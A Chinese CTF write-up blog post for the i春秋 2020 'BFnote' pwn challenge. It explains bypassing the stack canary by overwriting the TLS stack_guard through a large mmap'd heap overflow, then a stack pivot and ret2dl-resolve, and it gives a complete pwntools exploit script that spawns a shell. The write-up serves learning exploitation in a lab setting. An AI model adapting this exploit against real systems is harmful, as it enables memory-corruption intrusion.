i春秋2020新春战役PWN之BFnote (修改TLS结构来bypass canary)

最新推荐文章于 2024-06-05 23:29:12 发布
最新推荐文章于 2024-06-05 23:29:12 发布
阅读量2.1k 收藏 5
点赞数 2
分类专栏: pwn CTF 二进制漏洞 文章标签: 安全 CTF 二进制漏洞 缓冲区溢出 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104479071
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

BFnote

首先,检查一下程序的保护机制

然后,我们用IDA分析一下

一开始处,有一个栈溢出漏洞,但是由于开启了canary保护,得想办法绕过canary。下方的堆溢出,不仔细看还发现不了,v4只有一开始被初始化,在循环里,只有i被重新赋值,v4没变,而下方又用到了v4

这题是可以绕过canary的,这就牵涉到了一个知识点。

在linux下,有一种线程局部存储(Thread Local Storage)机制,简称TLS。它主要存储着一个线程的一些全局变量。它的结构如下

  1. typedef struct  
  2. {  
  3.   void *tcb;        /* Pointer to the TCB.  Not necessarily the  
  4.                thread descriptor used by libpthread.  */  
  5.   dtv_t *dtv;  
  6.   void *self;       /* Pointer to the thread descriptor.  */  
  7.   int multiple_threads;  
  8.   int gscope_flag;  
  9.   uintptr_t sysinfo;  
  10.   uintptr_t stack_guard;  
  11.   uintptr_t pointer_guard;  
  12.   ...  
  13. } tcbhead_t;  

而我们的canary是怎么取得的呢

而gs或者fs寄存器就正好指向的是这个结构。结构里的uintptr_t stack_guard就是canary值,因此,绕过我们能利用漏洞篡改这个结构里的stack_guard值,也就可以绕过canary了。

在glibc2.23中,这个结构存储在一块mmap出的内存里,在libc.so的上方,如果是其他版本的glibc,则不一定。

如果我们能够申请一块堆到debug001的上方,利用堆溢出,便能修改到debug001,也就是能修改到TLS结构。正好,本题malloc的大小不受限制,我们只需要malloc一个很大的堆>=0x20000,malloc就会使用mmap来分配内存,正好可以分配到debug001上方。

当我们申请到了上方后,不能直接覆盖TLS结构,因为在stack_guard 变量前面的几个变量更系统调用有关,不能改了,因此我们不能覆盖,而应该单独修改stack_guard的值。那么我们可以利用下标越界溢出来修改

通过调试,计算出偏移,然后修改即可。

  1. #mmap一个合适堆,在glibc2.23下可以分配到TLS结构上方附近  
  2. sh.sendlineafter('Give your notebook size : ',str(1024*130))  
  3. overflow_len = 0x216FC  
  4. #初始化v4  
  5. sh.sendlineafter('Give your title size : ',str(overflow_len))  
  6. sh.sendlineafter('invalid ! please re-enter :','1')  
  7. sh.sendafter('Give your title : ','a')  
  8. #绕过canary的重点在这里,将TLS里的canary覆盖为aaaa  
  9. #raw_input()  
  10. sh.sendafter('Give your note :','aaaa')  

接下来,就是一个栈溢出了。

但是在ebp上方,取ecx的值作为地址取一个值,这意味着,我们不能覆盖ebp+var_4,这也就意味着我们不能覆盖到main函数的返回地址。

由此,我们将ebp+var_4覆盖为bss的地址,这样,就可以栈迁移到bss段,然后在bss段进行ROP

然后,我们注意到本题的输出,用的是fwritefprintf,这使得我们很难找到合适的gadget来控制参数。并且,这些函数的空间花销很大,调用需要开辟较大的栈空间,但是我们的bss段不允许。

经过再三的思考,最终,我们用到了ret2dl-resolve来解。Ret2dl-resolve详见https://blog.csdn.net/seaaseesa/article/details/104478081,通过伪造link_map,实现任意函数,任意地址动态解析。ret2dl-resolve时,需要注意对齐。不然偏移计算会有偏差

综上,我们的exp脚本

#coding:utf8
#32位下的ret2dl-resolve,伪造link_map实现任意地址解析
from pwn import *

sh = process('./BFnote',env={"LD_PRELOAD":"./libc.so.6"})
#sh = remote('123.56.85.29',6987)
libc = ELF('./libc.so.6')
elf = ELF('./BFnote')
read_got = elf.got['read']
read_plt = elf.plt['read']
bss = 0x804A040
pop_ebp = 0x80489db
leave_ret = 0x8048578
one_gadget = 0x3a80c

l_addr = one_gadget - libc.sym['read']
#注意,只要是可读写的内存地址即可,调试看看就知道了
r_offset = bss + l_addr * -1

#负数需要补码
if l_addr < 0:
   l_addr = l_addr + 0x100000000

#栈迁移
payload = 'a'*0x3A + p32(bss+0x100)
sh.sendafter('Give your description : ',payload)

#dl-runtime-resolve
#真正的dynsym的起始地址
dynsym_addr = 0x80481D8
#真正的dynstr的地址
dynstr = 0x80481D8
#调用dll_runtime_resolve处
plt_load = 0x8048456

#我们准备把link_map放置在bss+0x20处
fake_link_map_addr = bss + 0x600
#假的dyn_strtab
fake_dyn_strtab_addr = fake_link_map_addr + 0x4
fake_dyn_strtab = p32(0) + p32(dynstr) #fake_link_map_addr + 0x8
#假的dyn_symtab,我们要让对应的dynsym里的st_value指向一个已经解析过的函数的got表
#其他字段无关紧要,所以,我们让dynsym为read_got - 0x4,这样,相当于把read_got - 0x4处开始当做一个dynsym,这样st_value正好对应了read的地址
#并且(*(sym+5))&0x03 != 0也成立
fake_dyn_symtab_addr = fake_link_map_addr + 0xC
fake_dyn_symtab = p32(0) + p32(read_got - 0x4) #fake_link_map_addr + 0xC
#假的dyn_rel
fake_dyn_rel_addr = fake_link_map_addr + 0x14
fake_dyn_rel = p32(0) + p32(fake_link_map_addr + 0x1C) #fake_link_map_addr + 0x14
#假的rel.plt
fake_rel = p32(r_offset) + p32(0x7) + p32(0) #fake_link_map_addr + 0x1C
#l_addr
fake_link_map = p32(l_addr)
#由于link_map的中间部分在我们的攻击中无关紧要,所以我们把伪造的几个数据结构也放当中
fake_link_map += fake_dyn_strtab
fake_link_map += fake_dyn_symtab
fake_link_map += fake_dyn_rel
fake_link_map += fake_rel
fake_link_map = fake_link_map.ljust(0x34,'\x00')
#dyn_strtab的指针
fake_link_map += p32(fake_dyn_strtab_addr)
#dyn_strsym的指针
fake_link_map += p32(fake_dyn_symtab_addr) #fake_link_map_addr + 0x38
#存入/bin/sh字符串
fake_link_map += '/bin/sh'.ljust(0x40,'\x00')
#在fake_link_map_addr + 0x7C处,是rel.plt指针
fake_link_map += p32(fake_dyn_rel_addr)

#栈迁移后,我们再继续迁移一次,扩大空间,为dl-resolve做准备
payload1 = 'a'*0xDC + p32(pop_ebp) + p32(bss + 0x800) + p32(read_plt) + p32(leave_ret) + p32(0) + p32(bss + 0x600) + p32(0x1000)
#第一次,我们做栈迁移,同时继续调用read读取下一轮数据
sh.sendlineafter('Give your postscript : ',payload1)
#mmap一个合适堆,在glibc2.23下可以分配到TLS结构上方附近
sh.sendlineafter('Give your notebook size : ',str(1024*130))
overflow_len = 0x216FC
#初始化v4
sh.sendlineafter('Give your title size : ',str(overflow_len))
sh.sendlineafter('invalid ! please re-enter :','1')
sh.sendafter('Give your title : ','a')
#绕过canary的重点在这里,将TLS里的canary覆盖为aaaa
#raw_input()
sh.sendafter('Give your note :','aaaa')

#第二次,我们发送伪造的数据结构和dl-resolve的rop
rop = '\x00'*0x4 + p32(plt_load) + p32(fake_link_map_addr) + p32(0) + 'aaaa'
payload = fake_link_map.ljust(0x200,'\x00') + rop
sh.sendline(payload)

sh.interactive()

 

ha1vk
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN gyctf_2020_bfnote(劫持TLS结构,ret2_dl_runtime_resolve)
weixin_44145820的博客
04-19 1489
目录程序分析背景知识延迟绑定Canary漏洞利用Exp 程序分析 一道带有canary的栈溢出题目 main函数是吧ebp-4中存放地址再减四获得的 调试结果如下 背景知识 延迟绑定 本题需要利用ret2al_runtime_resolve,涉及到延迟绑定的技术,简单介绍一下函数绑定的过程,以atol的调用为例 我们看一下第一次调用程序atol,此时atol_got存放着atol@plt+6...
i 春秋月刊第六期:Linux pwn 零基础入门
10-23
i 春秋月刊第六期:Linux pwn 零基础入门
PWN学习】cannary绕过方式汇总
weixin_41748164的博客
12-23 719
利用cannary解题在现在的CTF比赛中似乎已经过时了,只是为了学习了解一下。
CTF-pwn 技术总结,二进制漏洞挖掘---安全机制绕过
键盘的起始页
04-01 506
学习linux pwn,linux安全机制的知识是绕不开的。如果能理解这些安全机制的原理以及不懂得如何绕过它们,那么在比赛时将你举步维艰,本节我就总结了所有linux安全机制的基本原理以及具体的绕过方法,希望能帮助一些小萌新更快入门,帮助需要进阶的朋友打好根基。
canary绕过感悟随记(pwn入门)
最新发布
2402_83422357的博客
06-05 1057
这个是假设总共要打70个长度,canary在0xc的位置,你刚开始打程序打到canary的位置总共是打了0x70-0xc计算一下就是0x64的位置了,那么,32位的机子.canary的值为4个字节,所以我们接收0x65,0x66,0x67就可以接收到canary前面的3个字节了.[0x65:0x68]左闭右开可以达到要求,而canary规定最后一个字节为\x00,用rjust(4,b'\x00')可以达到要求.rjust(4,b'\x00')这个的意思就是说,总共接收4个字节的数据,先接收完所有数据。
2020NU1LCTF两道pwn
abelxu
10-25 477
Signin 分析 new函数 只能对两个vector进行操作。每次new的数量超过限制时就会申请两倍的空间并把原来的空间释放 unk_2032A0和unk_2032C0的数据结构 struct Node{ void begin;#指向第一个元素,也是堆地址 void now;#指向当前元素 void end;#指向最后一个元素 } show函数 输出Node.now指向的元素 delete函数 并不会检测now指针是否小于begin。多次释放配合show可以泄露堆上的内容。 0x
Canary bypass
空舟的博客
05-04 397
Canary bypass 格式化字符串绕过canary 格式化字符串读取canary的值 //字符串泄露canary,最简单常用 Canary爆破(针对有fork函数的程序) fork作用相当于复制出一个相同的程序,逐位爆破canary的值,如果程序崩溃,则不是canary,反之为canary //局限性比较大,必须有fork函数 Stack smashing(故意触发canary_ssp leak) 劫持_stack_chk_fail 修改got表中_stack_chk_fail函数的地址,在
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
pwn2own2020:通过链接六个漏洞通过Safari破坏macOS内核
02-04
通过链接六个漏洞通过Safari破坏macOS内核 总览 该存储库包含利用和技术细节,并。 有关更多信息,您还可以查看。 该存储库还包括成功利用。 如何繁殖 ... ... 通过Safari使用攻击者服务器的IP访问网站: ...
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
i春秋2020新春战役PWN之document(绕过tcache的double free检测)
seaaseesa的博客
02-27 3143
Document 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,经典的增删改查程序 Delete功能没有清空指针,存在UAF漏洞 Create功能的size不可控 UAF无法修改到*heap处的内容,也就是next指针的值 Create功能最多允许创建7个堆 题目给我们的glibc版本为2.29,存在tcache机制,且增加了对tcache dou...
Canary 学习
H1zerguo的博客
10-04 628
pwn_Canary
i春秋上的几道pwn
sopora的博客
06-17 1722
01.pwnme-50: Tag: fmtstr任意读 / 整型溢出 / ret2csu_init #encoding:utf-8 from pwn import * #context.log_level = 'debug' def leak(addr): io.sendafter('>', '2') io.sendafter('username...
i春秋答题欢乐赛3 pwn
doudoudedi
12-02 275
emem确实很欢乐的 第一个题是直接布置shellcode然后跳过去执行即可 from pwn import * local=0 if local==1: p=process('./2') elf=ELF('./2') else: p=remote('120.55.43.255',11002) elf=ELF('./2') def exp(): p.recvuntil('ID:') ...
[阅读型]CTF中linux pwn的四大基本防御措施
easy_level1的博客
04-13 1457
讨论linux pwn中对二进制文件常见的四个基本防御措施 RELRO NX CANARY PIE
对某次比赛里PWN的分析
1phan的博客
04-11 692
MD5: FC76A2EFBD7D07A89A2DD343B9328E26 SHA1: EDAA95DB7406E5076A2AA8B30BA6B3E7547CD7B4 CRC32: 1374F4F7 很久很久之前某次CTFPWN。。。题目在附件。 首先分析.exe文件 前面可以看到程序创建了socket服务 黄色选中的call为‘程序功能
绕过Canary与Canary的泄露
Sakura给爷pwn全场
12-24 257
Canary学习(泄露Canary): https://blog.csdn.net/acsuccess/article/details/104115114 泄露canary: https://blog.csdn.net/qq_38204481/article/details/81076850
gcc安全编译选项详解(NX(DEP)、RELRO、PIE(ASLR)、CANARY、FORTIFY)
键盘的起始页
09-02 8036
gcc安全编译选项详解(NX(DEP)、RELRO、PIE(ASLR)、CANARY、FORTIFY)
pwn unlink
08-27
pwn是指通过利用软件或系统的漏洞来获取对计算机系统的控制权。而"unlink"是一种特定的攻击技术,用于利用堆溢出漏洞来篡改数据结构中的指针,从而绕过保护机制实现任意内存写入或代码执行。 具体来说,在一些使用了堆分配的程序中,如果程序中存在堆溢出漏洞,攻击者可以通过溢出数据来修改内存中的指针,从而达到任意内存写入或代码执行的目的。而unlink就是其中一种方法,它利用堆块的数据结构来绕过某些保护机制,实现对任意地址的任意写入。 需要注意的是,pwn和相关攻击技术都是非法行为,违反了计算机系统的安全规范和法律法规。我们强烈建议遵守合法合规的原则,不要从事任何非法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值